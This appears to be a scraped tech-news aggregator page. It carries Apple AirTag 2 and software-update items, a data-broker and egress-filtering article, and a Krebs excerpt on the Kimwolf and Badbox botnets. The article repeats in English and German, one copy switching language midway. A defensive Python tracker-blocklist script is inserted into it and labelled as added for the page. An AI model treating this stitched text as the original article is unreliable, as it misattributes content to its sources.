hosang I.T.

Tech

Tech Articles from a wide variety of topics and categories
Apple offers a Share Item Location feature in the Find My app that allows you to temporarily share the location of an AirTag-equipped item with others, including employees at participating airlines. This way, if you put an AirTag inside your bags, the airline can better help you find them in the event they are lost or delayed at the airport.


Given that Apple announced the AirTag 2 today, we have resurfaced a list of airlines that support the feature, but keep in mind that it also works with the original AirTag and third-party trackers with Find My support, such as those sold by Chipolo and Pebblebee.

Below, we have listed most of the airlines that support the feature:
AJet
Aer Lingus
Air Canada
Air France
Air India
Air New Zealand
American Airlines
Austrian Airlines
Breeze Airways
British Airways
Brussels Airlines
Cathay Pacific
Condor
Copa Airlines
China Airlines
Delta
Eurowings
Finnair
Flair Airlines
Iberia
JetBlue
KLM
LATAM Airlines
Lufthansa
Pegasus Airlines
Porter Airlines
Qantas
Saudia
Singapore Airlines
SunExpress
SWISS
Turkish Airlines
United
Virgin Atlantic
Vueling
WestJet

In its AirTag 2 press release, Apple said it has partnered with more than 50 airlines, so around 15 more should support the feature soon.

How to Use the Feature

iPhone, iPad, and Mac users can generate a "Share Item Location" link in the Find My app. Anyone they share the link with can then open a web page showing the item's location on a map. The page automatically updates with the item's latest known location.


The item's location stops being shared "as soon as a user is reunited with their item," or automatically expires after seven days.

On the iPhone, the feature was introduced on iOS 18.2, but Apple says the AirTag 2 requires an iPhone running iOS 26.2.1 or later. If you are still running iOS 18.2 through iOS 18.7.4, you will need to use the original AirTag or a supported third-party tracker.

AirTag 2: Hands-On Photos

Zach Griff of From the Tray Table has shared some AirTag 2 hands-on photos.
This article, "AirTag 2: These Airlines Offer Feature That Helps Find Your Lost Bags" first appeared on MacRumors.com

Apple today released watchOS 26.2.1, a minor update to watchOS 26, which came out last year. watchOS 26.2.1 comes six weeks after Apple released watchOS 26.2.


watchOS 26.2.1 can be downloaded for free on an iPhone running iOS 26.2.1 by opening up the Apple Watch app and going to General > Software Update, or initiating an update in the Settings app on the watch. To install the new software, the Apple Watch needs to have at least 50 percent battery and it needs to be placed on a charger.

Today's update enables Precision Finding for the new AirTag 2 on the Apple Watch Series 9 and later and the Apple Watch Ultra 2 and later. Until now, Precision Finding for the AirTag had been limited to the iPhone.

It is not yet clear if the update enables Precision Finding on Apple Watch for the original AirTag, or if this is a feature limited to the new AirTag 2.

According to Apple's release notes, watchOS 26.2.1 also includes unspecified bug fixes.

This article, "Apple Releases watchOS 26.2.1, Adding Precision Finding Support for AirTag 2" first appeared on MacRumors.com

Apple today released iOS 26.2.1 and iPadOS 26.2.1, minor updates to the iOS 26 and iPadOS 26 operating systems. The new software comes a month after Apple released iOS 26.2 and iPadOS 26.2.


The new software can be downloaded on eligible iPhones and iPads over-the-air by going to Settings > General > Software Update.

iOS 26.2.1 adds support for the next-generation AirTag that Apple introduced today. The AirTag 2 features a second-generation Ultra Wideband chip, improving the Precision Finding feature.

The update also includes unspecified bug fixes, according to Apple's release notes.

Apple also released iOS 18.7.4, iOS 16.7.13, iOS 15.8.6, and iOS 12.5.8 for older iPhones unable to run iOS 26.
This article, "Apple Releases iOS 26.2.1 With AirTag 2 Support" first appeared on MacRumors.com

Apple is developing a much thinner Face ID hardware module in an effort to reduce the space its facial authentication system takes up in the iPhone Air, a known leaker on China's Weibo social media platform today suggested.


According to Instant Digital, Apple has requested an "ultra-thin" Face ID component from suppliers that will allow the device to accommodate an ultra wide-angle lens in addition to the existing single main lens.

A redesign that includes a second camera is said to be one way that Apple thinks it can address user complaints that the iPhone Air, while an impressive design feat, has led to too many hardware compromises, especially given the $999 price tag.

Multiple technologies are housed in the plateau of the iPhone Air to maximize space for the battery, so Apple would presumably need to redesign the internals considerably to fit in another camera. Chinese leaker Digital Chat Station in November said Apple was focusing on making the device ultra-thin and lightweight in order to do just that.

The claim was soon followed by a report by The Information suggesting a second camera for the device was indeed in development.

For its rumored upcoming foldable iPhone, expected later this year, Apple has reportedly chosen to integrate Touch ID into the side button, rather than use Face ID, in order to make the device as slim as possible. Designing a smaller TrueDepth camera system could arguably see a next-generation model switch over to facial authentication.

Today's leaker speculates that an ultra-thin Face ID module could even eventually find its way into a MacBook, but there are no active rumors that indicate this is something Apple is working on.

In 2022, Bloomberg's Mark Gurman said Apple tested Face ID for the iMac, but the technology necessary to embed the authentication hardware into a thin notebook display simply wasn't available, and the biometric system has yet to be added to any Mac.

Around the same time, a marketing employee for Apple argued that Touch ID is more convenient, since the button is near your hands. Of course, that does not rule out the possibility of Apple adding Face ID to a Mac in the future.

The latest claim doesn't point to any imminent product changes (the second-generation iPhone Air is not expected until next year), but it does suggest Apple is actively reassessing how its Face ID hardware is packaged. Watch this space.
This article, "Apple Developing Thinner Face ID for iPhone Air 2, Report Suggests" first appeared on MacRumors.com

The new AirTag that Apple unveiled today features a second-generation Ultra Wideband chip, enabling the Precision Finding feature to work up to 50% farther away from an item compared to the previous AirTag, according to Apple. However, you need a compatible iPhone model in order to take advantage of this improvement.


The improved Precision Finding requires one of these iPhone models:
iPhone 15
iPhone 15 Plus
iPhone 15 Pro
iPhone 15 Pro Max
iPhone 16
iPhone 16 Plus
iPhone 16 Pro
iPhone 16 Pro Max
iPhone 17
iPhone 17 Pro
iPhone 17 Pro Max
iPhone Air
Precision Finding at longer distances is limited to the iPhone models listed above because both the AirTag and the iPhone need Apple's second-generation Ultra Wideband chip, which was introduced starting with the iPhone 15 series.

Note that the lower-end iPhone 16e does not have a second-generation Ultra Wideband chip.

The new AirTag also has an upgraded Bluetooth chip for improved overall range outside of Precision Finding mode, with an iPhone 11 or newer.

The new AirTag is available to order on Apple.com and in the Apple Store app starting today, and it will be available at Apple Store locations later this week. In the U.S., pricing remains set at $29 for one AirTag and at $99 for four.
This article, "New AirTag's Improved Precision Finding Requires These iPhone Models" first appeared on MacRumors.com

Cybersecurity researchers have discovered an ongoing campaign that's targeting Indian users with a multi-stage backdoor as part of a suspected cyber espionage campaign. The activity, per the eSentire Threat Response Unit (TRU), involves using phishing emails impersonating the Income Tax Department of India to trick victims into downloading a malicious archive, ultimately granting the threat
Digineer Station – shutterstock.com
In a networked business world, companies face unprecedented cybersecurity challenges. According to the IBM Cost of a Data Breach Report 2024, the average cost of a data breach caused by phishing is about 4.88 million dollars. Industry estimates put the number of phishing e-mails sent every day at about 3.4 billion. At the same time, the global data broker industry is growing to an estimated 280 billion dollars in 2024. This industry systematically collects information about employees, customers and business partners, often without their knowledge. Traditional security concepts such as firewalls and intrusion detection are no longer sufficient.
The limits of firewalls and intrusion detection
A firewall is indispensable, but it has fundamental limitations: it is mainly reactive and configured for known threats. With around 300,000 new malware variants every day, considerable gaps remain. It also focuses primarily on keeping intruders out of the corporate network; the uncontrolled transfer of sensitive data outward often goes unnoticed.
Intrusion detection systems (IDS), in turn, only detect intruders once they are already inside the system, comparable to a smoke detector that warns of a fire but does not prevent it. Advanced persistent threats (APTs) can thus remain undetected in networks for months.
What the data industry knows about your company
Data brokers systematically collect information that goes far beyond what companies are aware of. According to industry reports, leading data brokers hold personal data on an estimated 70 percent of the world's online population. The market value of this industry is around 280 billion dollars in 2024, larger than the global cybersecurity market.
The collected data concerns not only the company itself but also its employees, customers and business partners.
The dangerous part: this data flows out continuously and unnoticed, through everyday internet use at the workplace. Every website visit, every app, every connected device becomes a data supplier. To a conventional firewall this outflow is invisible, because it looks like legitimate outbound traffic: typically HTTPS on port 443 to destinations the firewall has no rule against.
The data industry collects extensive information about employees. Location and movement patterns are derived from the IP address used while browsing. From this, detailed profiles emerge of which technologies an employee researches, which projects they work on and which competitors they analyze.
Professional role and position are recorded too: trackers on career portals such as LinkedIn and Xing register profile visits and interactions, while browser fingerprinting identifies returning visitors even without cookies. The combination of company domain, browsing behaviour and social media activity allows attribution to specific people and their decision-making authority. As for communication patterns and metadata: even with encrypted e-mail, the metadata can still be read along the way. End-to-end encryption (PGP, S/MIME) protects only the message body; sender, recipient, subject and timestamps travel in the clear.
Sensitive information is also collected about customers and business partners. Business relationships can be determined when employees visit customer websites or use partner portals, since embedded trackers can record these connections and the frequency of visits reveals the intensity of the relationship. Project information becomes visible because research into specific technologies, industries or markets is logged via browser tracking, from which it can be inferred which projects are under way and which investments are planned. When cloud-based CRM systems, project management tools or collaboration platforms are used, embedded analytics scripts can also capture information about the customer data being processed.
Data brokers offer their databases as a legal service, for example for background checks, marketing or credit checks. That means cybercriminals and state actors can acquire this data without difficulty, too.
How cybercriminals use this data
In CEO fraud, attackers impersonate managing directors or executives to induce employees to transfer funds. According to the FBI, between 2013 and 2023 more than 305,000 such incidents led to worldwide losses of over 55 billion dollars. The information data brokers collect about position, travel plans and current projects makes these attacks frighteningly credible. In 2024, 64 percent of companies reported such attacks.
Spear phishing, unlike broadly scattered phishing, targets specific employees. With knowledge of their role, projects and contacts, attackers craft highly personalized messages. Although spear phishing accounts for less than 0.1 percent of e-mail volume, it is responsible for 66 percent of all data breaches.
State actors as an additional threat
Besides cybercriminals, state-funded hacking groups pose a growing threat to companies. These so-called nation-state actors have considerable resources and use the information collected by data brokers for targeted industrial espionage and sabotage.
The figures are alarming: according to CrowdStrike, Chinese cyber espionage activity rose by 150 percent in 2024, and by up to 300 percent in certain industries. The BSI registered an average of 309,000 new malware variants per day in 2024. According to Microsoft, Russian, Chinese, Iranian and North Korean groups are responsible for the majority of state-backed cyberattacks. The known APT (advanced persistent threat) groups alone, such as APT27, APT28, APT29, APT31, APT41, Lazarus Group and Kimsuky, run hundreds of active campaigns against Western companies.
These groups use the information available from data brokers for precise target identification, for social engineering attacks and for long-term, undetected infiltration of corporate networks. The average dwell time of an APT in a compromised network is several months, time enough to exfiltrate sensitive trade secrets.
What digital integrity means
Digital integrity describes the intactness, correctness and completeness of data, as well as the right to protect one's digital identity and communication from unauthorized access. For companies this means: digital information must not be falsified or intercepted without authorization. Employees, customers and business partners must be able to trust that their data is protected.
Protective measures for companies
Security & privacy boxes are an evolution of the firewall that filter outbound traffic by destination, blocking known tracker and data broker endpoints on the way out, and can thus help to significantly reduce the unwanted outflow of information from the company.
It is crucial that the solution is trustworthy: no misuse as a surveillance tool, trackers cannot buy their way onto an allowlist, and the vendor must be independent of advertising revenue and data trading.
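The two points above (tracker traffic that a port-based firewall passes as ordinary HTTPS, and the destination-level filtering a security & privacy box adds) can be shown with a small egress filter. The following Python is an added example written for this page, not code from the article or from any vendor's product. It reads outbound connection log lines in a constructed format (timestamp, client IP, destination host:port, bytes sent), matches each destination against a constructed tracker blocklist on domain-label boundaries, and reports which internal client contacted which tracker and how many bytes left. The blocklist entries, log lines and client addresses are all made up for the example.

```python
"""Egress-side tracker filter (added example, not the article's own code).

Log format (constructed for this example, one connection per line):
    <ISO timestamp> <client IP> <destination host>:<port> <bytes sent>
"""
import re
from collections import Counter, defaultdict
from typing import Iterable, Optional

# Constructed blocklist of tracker / data-broker domains. A real deployment
# would load a maintained list; these names exist only for the example.
TRACKER_BLOCKLIST = frozenset({
    "tracker.example",
    "analytics.example",
    "fingerprint.example",
})

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"(?P<host>[A-Za-z0-9.-]+):(?P<port>\d{1,5})\s+(?P<bytes_out>\d+)$"
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one log line; return None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": m["ts"],
        "client": m["client"],
        "host": m["host"],
        "port": int(m["port"]),
        "bytes_out": int(m["bytes_out"]),
    }


def _candidate_domains(host: str) -> Iterable[str]:
    """Yield the host and each parent domain down to (but excluding) the TLD.

    'cdn.tracker.example' -> 'cdn.tracker.example', 'tracker.example'
    Matching on label boundaries keeps 'nottracker.example' from matching
    'tracker.example', which a plain substring check would get wrong.
    """
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        yield ".".join(labels[i:])


def matched_tracker(host: str, blocklist=TRACKER_BLOCKLIST) -> Optional[str]:
    """Return the blocklist entry that covers `host`, or None if it is allowed."""
    for candidate in _candidate_domains(host):
        if candidate in blocklist:
            return candidate
    return None


def analyze(lines: Iterable[str], blocklist=TRACKER_BLOCKLIST):
    """Walk the log and tally tracker contacts per client and bytes per tracker.

    A port-based rule ("allow outbound 443") would pass every one of these
    connections; only the destination-domain check separates the partner
    portal from the trackers embedded in it.
    """
    hits: dict = defaultdict(Counter)   # client -> Counter(tracker -> contacts)
    bytes_out: Counter = Counter()      # tracker -> bytes sent to it
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tracker = matched_tracker(rec["host"], blocklist)
        if tracker is None:
            continue
        hits[rec["client"]][tracker] += 1
        bytes_out[tracker] += rec["bytes_out"]
    return hits, bytes_out


# Constructed sample log: one workstation opening a partner portal that embeds
# two trackers, another hitting a fingerprinting endpoint, plus a malformed line.
SAMPLE_LOG = [
    "2025-01-10T09:14:02Z 10.0.1.15 crm.partner-portal.example:443 812",
    "2025-01-10T09:14:03Z 10.0.1.15 cdn.tracker.example:443 1460",
    "2025-01-10T09:14:03Z 10.0.1.15 px.analytics.example:443 620",
    "2025-01-10T09:15:11Z 10.0.1.22 careers.jobsite.example:443 2048",
    "2025-01-10T09:15:12Z 10.0.1.22 api.fingerprint.example:443 930",
    "2025-01-10T09:16:40Z 10.0.1.22 tracker.example:443 210",
    "2025-01-10T09:17:00Z 10.0.1.15 nottracker.example:443 100",
    "garbage line that does not match the format",
]


def report(lines: Iterable[str] = SAMPLE_LOG) -> str:
    """Render the per-client tracker contacts and per-tracker byte totals."""
    hits, bytes_out = analyze(lines)
    out = []
    for client in sorted(hits):
        for tracker, n in sorted(hits[client].items()):
            out.append(f"{client} -> {tracker}: {n} contact(s)")
    for tracker, b in sorted(bytes_out.items()):
        out.append(f"{tracker}: {b} bytes sent")
    return "\n".join(out)


if __name__ == "__main__":
    print(report())
```

The label-boundary match is the part worth copying: a substring or `endswith` check would either miss `cdn.tracker.example` or wrongly block `nottracker.example`. In practice the same logic sits in front of a DNS resolver or forward proxy so the connection is refused rather than merely counted, and the per-client counters are what tell you which workstation is feeding a given broker.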
Besides deploying a security & privacy box, CISOs should implement further measures: regular employee training on phishing and social engineering, and self-hosting sensitive data instead of relying on external cloud providers. A zero-trust architecture based on the principle "trust no one, verify everything" forms an important foundation.
In addition, it should be checked regularly which company data is publicly accessible. (jm)
View the full article
Digineer Station – shutterstock.com
In einer vernetzten Geschäftswelt stehen Unternehmen vor beispiellosen Cybersicherheits-Herausforderungen. Laut dem IBM Cost of a Data Breach Report 2024 betragen die durchschnittlichen Kosten eines durch Phishing verursachten Datenlecks etwa 4,88 Millionen Dollar. Nach Branchenschätzungen werden täglich etwa 3,4 Milliarden Phishing-E-Mails verschickt. Gleichzeitig wächst die globale Datenhändlerbranche auf geschätzte 280 Milliarden Dollar im Jahr 2024. Diese Branche sammelt systematisch Informationen über Mitarbeiter, Kunden und Geschäftspartner – oft ohne deren Wissen. Traditionelle Sicherheitskonzepte wie Firewalls und Intrusion Detection reichen nicht mehr aus.
Die Grenzen von Firewall und Intrusion Detection
Eine Firewall ist unverzichtbar, hat jedoch fundamentale Einschränkungen: Sie ist hauptsächlich reaktiv und auf bekannte Bedrohungen konfiguriert. Bei täglich 300.000 neuen Malware- Varianten entstehen erhebliche Sicherheitslücken. Zudem konzentriert sie sich primär darauf, dass niemand ins Firmennetzwerk eindringt – die unkontrollierte Übertragung sensibler Daten nach außen bleibt oft unbemerkt.
Intrusion-Detection-Systeme (IDS) wiederum erkennen Eindringlinge erst, wenn diese bereits im System sind – vergleichbar mit einem Rauchmelder, der vor einem Brand warnt, ihn aber nicht verhindert. Advanced Persistent Threats (APTs) können so monatelang unentdeckt in Netzwerken verweilen.
Was die Datenindustrie über Ihr Unternehmen weiß
Data Broker sammeln systematisch Informationen, die weit über das hinausgehen, was Unternehmen bewusst ist. Nach Branchenberichten haben führende Data Broker personenbezogene Daten von schätzungsweise 70 Prozent der weltweiten Online-Bevölkerung erfasst. Der Marktwert dieser Branche beträgt 2024 rund 280 Milliarden Dollar – größer als der globale Cybersicherheitsmarkt.
Die gesammelten Daten betreffen nicht nur das Unternehmen selbst, sondern auch Mitarbeiter, Kunden und Geschäftspartner.
Das Gefährliche: Diese Daten fließen kontinuierlich und unbemerkt ab – durch alltägliche Internetnutzung am Arbeitsplatz. Jeder Webseitenbesuch, jede App-Nutzung, jedes vernetzte Gerät wird zum Datenlieferanten. Für herkömmliche Firewalls ist dieser Datenabfluss unsichtbar, da er als legitimer ausgehender Datenverkehr erscheint.
Über Mitarbeiter erfasst die Datenindustrie umfangreiche Informationen. Standort und Bewegungsmuster werden über die IP-Adresse beim Surfen ermittelt. Daraus entstehen detaillierte Profile darüber, welche Technologien ein Mitarbeiter recherchiert, an welchen Projekten er arbeitet und welche Wettbewerber er analysiert.
Auch die berufliche Rolle und Position werden erfasst: Tracker auf Karriereportalen wie LinkedIn und Xing registrieren Profilbesuche und Interaktionen, während Browser-Fingerprinting wiederkehrende Besucher auch ohne Cookies identifiziert. Die Kombination aus Firmendomain, Surfverhalten und Social-Media-Aktivitäten ermöglicht die Zuordnung zu konkreten Personen und ihren Entscheidungsbefugnissen. Hinsichtlich Kommunikationsmuster und Metadaten gilt: Selbst bei verschlüsselten E-Mails können alle Metadaten mitgelesen werden.
Über Kunden und Geschäftspartner werden ebenfalls sensible Informationen gesammelt. Geschäftsbeziehungen lassen sich ermitteln, wenn Mitarbeiter Kunden-Websites besuchen oder Partner- Portale nutzen, da eingebettete Tracker diese Verbindungen erfassen können und die Häufigkeit der Besuche die Intensität der Geschäftsbeziehung verrät. Projektinformationen werden sichtbar, weil Recherchen zu bestimmten Technologien, Branchen oder Märkten über Browser-Tracking protokolliert werden. Daraus lässt sich ableiten, an welchen Projekten gearbeitet wird und welche Investitionen geplant sind. Bei der Nutzung von Cloud-basierten CRM- Systemen, Projektmanagement-Tools oder Collaboration-Plattformen können eingebettete Analyse-Skripte zudem Informationen über verarbeitete Kundendaten erfassen.
Data Broker bieten ihre Datenbanken als legale Dienstleistung an, etwa für Hintergrundüberprüfungen, Marketing oder Kreditwürdigkeitsprüfungen. Das bedeutet: Auch Cyberkriminelle und staatliche Akteure können diese Daten problemlos erwerben.
Wie Cyberkriminelle diese Daten nutzen
Beim CEO Fraud (Chef-Betrug) geben sich Angreifer als Geschäftsführer oder Führungskräfte aus, um Mitarbeiter zur Überweisung von Geldern zu verleiten. Laut FBI führten zwischen 2013 und 2023 über 305.000 solcher Vorfälle zu weltweiten Verlusten von über 55 Milliarden Dollar. Die von Data Brokern gesammelten Informationen über Position, Reisepläne und aktuelle Projekte machen diese Angriffe erschreckend glaubwürdig. 2024 berichteten 64 Prozent der Unternehmen von solchen Angriffen.
Spear Phishing zielt im Gegensatz zu breit gestreutem Phishing auf spezifische Mitarbeiter. Mit Wissen über deren Rolle, Projekte und Kontakte erstellen Angreifer hochgradig personalisierte Nachrichten. Obwohl Spear-Phishing weniger als 0,1 Prozent des E-Mail-Volumens ausmacht, ist es für 66 Prozent aller Datenpannen verantwortlich.
Staatliche Akteure als zusätzliche Bedrohung
Neben Cyberkriminellen stellen staatlich finanzierte Hackergruppen eine wachsende Bedrohung für Unternehmen dar. Diese sogenannten Nation-State Actors verfügen über erhebliche Ressourcen und nutzen die von Data Brokern gesammelten Informationen für gezielte Wirtschaftsspionage und Sabotage.
Die Zahlen sind alarmierend: Laut CrowdStrike nahmen chinesische Cyber-Spionage-Aktivitäten 2024 um 150 Prozent zu, in bestimmten Branchen sogar um bis zu 300 Prozent. Das BSI registrierte 2024 durchschnittlich 309.000 neue Malware-Varianten pro Tag. Nach Angaben von Microsoft sind russische, chinesische, iranische und nordkoreanische Gruppen für den Großteil der staatlich unterstützten Cyberangriffe verantwortlich. Allein die bekannten APT-Gruppen (Advanced Persistent Threats) wie APT27, APT28, APT29, APT31, APT41, Lazarus Group und Kimsuky führen hunderte aktive Kampagnen gegen westliche Unternehmen durch.
Diese Gruppen nutzen die von Data Brokern verfügbaren Informationen zur präzisen Zielidentifikation, für Social-Engineering– Angriffe und zur langfristigen, unentdeckten Infiltration von Unternehmensnetzwerken. Die durchschnittliche Verweildauer eines APT in einem kompromittierten Netzwerk beträgt mehrere Monate – Zeit genug, um sensible Geschäftsgeheimnisse zu exfiltrieren.
Was digitale Integrität bedeutet
Digitale Integrität beschreibt die Unversehrtheit, Korrektheit und Vollständigkeit von Daten sowie das Recht, die digitale Identität und Kommunikation vor unbefugtem Zugriff zu schützen. Für Unternehmen bedeutet dies: Digitale Informationen dürfen nicht unbefugt verfälscht oder abgefangen werden. Mitarbeiter, Kunden und Geschäftspartner müssen darauf vertrauen können, dass ihre Daten geschützt sind.
Schutzmaßnahmen für Unternehmen
Security & Privacy Boxen sind eine Weiterentwicklung von Firewalls, die dazu beitragen können, den ungewollten Abfluss von Informationen aus dem Unternehmen deutlich zu reduzieren.
Entscheidend ist, dass die Lösung vertrauenswürdig ist: Kein Missbrauch als Überwachungsinstrument, Tracker können sich nicht freikaufen, und der Hersteller muss unabhängig von Werbeeinnahmen und Datenhandel sein.
Neben dem Einsatz einer Security & Privacy Box sollten CISOs aber weitere Maßnahmen implementieren. Dazu gehören regelmäßige Mitarbeiterschulungen zu Phishing und Social Engineering sowie das Eigen-Hosting sensibler Daten statt der Nutzung externer Cloud- Anbieter. Eine Zero-Trust-Architektur nach dem Prinzip ‚Vertraue niemandem, verifiziere alles’ bildet eine wichtige Grundlage.
Ergänzend sollte regelmäßig überprüft werden, welche Unternehmensdaten öffentlich zugänglich sind. (jm)
View the full article
Digineer Station – shutterstock.com
In einer vernetzten Geschäftswelt stehen Unternehmen vor beispiellosen Cybersicherheits-Herausforderungen. Laut dem IBM Cost of a Data Breach Report 2024 betragen die durchschnittlichen Kosten eines durch Phishing verursachten Datenlecks etwa 4,88 Millionen Dollar. Nach Branchenschätzungen werden täglich etwa 3,4 Milliarden Phishing-E-Mails verschickt. Gleichzeitig wächst die globale Datenhändlerbranche auf geschätzte 280 Milliarden Dollar im Jahr 2024. Diese Branche sammelt systematisch Informationen über Mitarbeiter, Kunden und Geschäftspartner – oft ohne deren Wissen. Traditionelle Sicherheitskonzepte wie Firewalls und Intrusion Detection reichen nicht mehr aus.
Die Grenzen von Firewall und Intrusion Detection
Eine Firewall ist unverzichtbar, hat jedoch fundamentale Einschränkungen: Sie ist hauptsächlich reaktiv und auf bekannte Bedrohungen konfiguriert. Bei täglich 300.000 neuen Malware- Varianten entstehen erhebliche Sicherheitslücken. Zudem konzentriert sie sich primär darauf, dass niemand ins Firmennetzwerk eindringt – die unkontrollierte Übertragung sensibler Daten nach außen bleibt oft unbemerkt.
Intrusion-Detection-Systeme (IDS) wiederum erkennen Eindringlinge erst, wenn diese bereits im System sind – vergleichbar mit einem Rauchmelder, der vor einem Brand warnt, ihn aber nicht verhindert. Advanced Persistent Threats (APTs) können so monatelang unentdeckt in Netzwerken verweilen.
Was die Datenindustrie über Ihr Unternehmen weiß
Data Broker sammeln systematisch Informationen, die weit über das hinausgehen, was Unternehmen bewusst ist. Nach Branchenberichten haben führende Data Broker personenbezogene Daten von schätzungsweise 70 Prozent der weltweiten Online-Bevölkerung erfasst. Der Marktwert dieser Branche beträgt 2024 rund 280 Milliarden Dollar – größer als der globale Cybersicherheitsmarkt.
Die gesammelten Daten betreffen nicht nur das Unternehmen selbst, sondern auch Mitarbeiter, Kunden und Geschäftspartner.
Das Gefährliche: Diese Daten fließen kontinuierlich und unbemerkt ab – durch alltägliche Internetnutzung am Arbeitsplatz. Jeder Webseitenbesuch, jede App-Nutzung, jedes vernetzte Gerät wird zum Datenlieferanten. Für herkömmliche Firewalls ist dieser Datenabfluss unsichtbar, da er als legitimer ausgehender Datenverkehr erscheint.
Über Mitarbeiter erfasst die Datenindustrie umfangreiche Informationen. Standort und Bewegungsmuster werden über die IP-Adresse beim Surfen ermittelt. Daraus entstehen detaillierte Profile darüber, welche Technologien ein Mitarbeiter recherchiert, an welchen Projekten er arbeitet und welche Wettbewerber er analysiert.
Auch die berufliche Rolle und Position werden erfasst: Tracker auf Karriereportalen wie LinkedIn und Xing registrieren Profilbesuche und Interaktionen, während Browser-Fingerprinting wiederkehrende Besucher auch ohne Cookies identifiziert. Die Kombination aus Firmendomain, Surfverhalten und Social-Media-Aktivitäten ermöglicht die Zuordnung zu konkreten Personen und ihren Entscheidungsbefugnissen. Hinsichtlich Kommunikationsmuster und Metadaten gilt: Selbst bei verschlüsselten E-Mails können alle Metadaten mitgelesen werden.
Über Kunden und Geschäftspartner werden ebenfalls sensible Informationen gesammelt. Geschäftsbeziehungen lassen sich ermitteln, wenn Mitarbeiter Kunden-Websites besuchen oder Partner- Portale nutzen, da eingebettete Tracker diese Verbindungen erfassen können und die Häufigkeit der Besuche die Intensität der Geschäftsbeziehung verrät. Projektinformationen werden sichtbar, weil Recherchen zu bestimmten Technologien, Branchen oder Märkten über Browser-Tracking protokolliert werden. Daraus lässt sich ableiten, an welchen Projekten gearbeitet wird und welche Investitionen geplant sind. Bei der Nutzung von Cloud-basierten CRM- Systemen, Projektmanagement-Tools oder Collaboration-Plattformen können eingebettete Analyse-Skripte zudem Informationen über verarbeitete Kundendaten erfassen.
Data Broker bieten ihre Datenbanken als legale Dienstleistung an, etwa für Hintergrundüberprüfungen, Marketing oder Kreditwürdigkeitsprüfungen. Das bedeutet: Auch Cyberkriminelle und staatliche Akteure können diese Daten problemlos erwerben.
Wie Cyberkriminelle diese Daten nutzen
Beim CEO Fraud (Chef-Betrug) geben sich Angreifer als Geschäftsführer oder Führungskräfte aus, um Mitarbeiter zur Überweisung von Geldern zu verleiten. Laut FBI führten zwischen 2013 und 2023 über 305.000 solcher Vorfälle zu weltweiten Verlusten von über 55 Milliarden Dollar. Die von Data Brokern gesammelten Informationen über Position, Reisepläne und aktuelle Projekte machen diese Angriffe erschreckend glaubwürdig. 2024 berichteten 64 Prozent der Unternehmen von solchen Angriffen.
Unlike broadly distributed phishing, spear phishing targets specific employees. Using knowledge of their role, projects and contacts, attackers craft highly personalised messages. Although spear phishing accounts for less than 0.1 percent of email volume, it is responsible for 66 percent of all data breaches.
State actors as an additional threat
Besides cybercriminals, state-funded hacking groups pose a growing threat to companies. These so-called nation-state actors have substantial resources and use the information collected by data brokers for targeted economic espionage and sabotage.
The figures are alarming: according to CrowdStrike, Chinese cyber-espionage activity rose by 150 percent in 2024, and by as much as 300 percent in certain industries. The BSI registered an average of 309,000 new malware variants per day in 2024. According to Microsoft, Russian, Chinese, Iranian and North Korean groups are responsible for the majority of state-backed cyberattacks. The known APT (Advanced Persistent Threat) groups alone, such as APT27, APT28, APT29, APT31, APT41, Lazarus Group and Kimsuky, run hundreds of active campaigns against Western companies.
These groups use the information available from data brokers for precise target identification, for social-engineering attacks and for long-term, undetected infiltration of corporate networks. The average dwell time of an APT in a compromised network is several months, which is time enough to exfiltrate sensitive trade secrets.
What digital integrity means
Digital integrity describes the intactness, correctness and completeness of data, as well as the right to protect one's digital identity and communication from unauthorised access. For companies this means that digital information must not be tampered with or intercepted without authorisation. Employees, customers and business partners must be able to trust that their data is protected.
Protective measures for companies
Security & privacy boxes are an evolution of firewalls that can help to significantly reduce the unwanted outflow of information from the company.
It is crucial that the solution is trustworthy: no misuse as a surveillance tool, trackers cannot buy their way out, and the vendor must be independent of advertising revenue and data trading.
Beyond deploying a security & privacy box, CISOs should implement further measures. These include regular employee training on phishing and social engineering, as well as self-hosting sensitive data instead of using external cloud providers. A zero-trust architecture following the principle "trust no one, verify everything" forms an important foundation.
In addition, companies should regularly review which corporate data is publicly accessible. (jm)
The cybercriminals in control of Kimwolf — a disruptive botnet that has infected more than 2 million devices — recently shared a screenshot indicating they’d compromised the control panel for Badbox 2.0, a vast China-based botnet powered by malicious software that comes pre-installed on many Android TV streaming boxes. Both the FBI and Google say they are hunting for the people behind Badbox 2.0, and thanks to bragging by the Kimwolf botmasters we may now have a much clearer idea about that.
Our first story of 2026, The Kimwolf Botnet is Stalking Your Local Network, detailed the unique and highly invasive methods Kimwolf uses to spread. The story warned that the vast majority of Kimwolf infected systems were unofficial Android TV boxes that are typically marketed as a way to watch unlimited (pirated) movie and TV streaming services for a one-time fee.
Our January 8 story, Who Benefitted from the Aisuru and Kimwolf Botnets?, cited multiple sources saying the current administrators of Kimwolf went by the nicknames “Dort” and “Snow.” Earlier this month, a close former associate of Dort and Snow shared what they said was a screenshot the Kimwolf botmasters had taken while logged in to the Badbox 2.0 botnet control panel.
That screenshot, a portion of which is shown below, shows seven authorized users of the control panel, including one that doesn’t quite match the others: According to my source, the account “ABCD” (the one that is logged in and listed in the top right of the screenshot) belongs to Dort, who somehow figured out how to add their email address as a valid user of the Badbox 2.0 botnet.
The control panel for the Badbox 2.0 botnet lists seven authorized users and their email addresses.
Badbox has a storied history that well predates Kimwolf’s rise in October 2025. In July 2025, Google filed a “John Doe” lawsuit (PDF) against 25 unidentified defendants accused of operating Badbox 2.0, which Google described as a botnet of over ten million unsanctioned Android streaming devices engaged in advertising fraud. Google said Badbox 2.0, in addition to compromising multiple types of devices prior to purchase, also can infect devices by requiring the download of malicious apps from unofficial marketplaces.
Google’s lawsuit came on the heels of a June 2025 advisory from the Federal Bureau of Investigation (FBI), which warned that cyber criminals were gaining unauthorized access to home networks by either configuring the products with malware prior to the user’s purchase, or infecting the device as it downloads required applications that contain backdoors — usually during the set-up process.
The FBI said Badbox 2.0 was discovered after the original Badbox campaign was disrupted in 2024. The original Badbox was identified in 2023, and primarily consisted of Android operating system devices (TV boxes) that were compromised with backdoor malware prior to purchase.
KrebsOnSecurity was initially skeptical of the claim that the Kimwolf botmasters had hacked the Badbox 2.0 botnet. That is, until we began digging into the history of the qq.com email addresses in the screenshot above.
CATHEAD
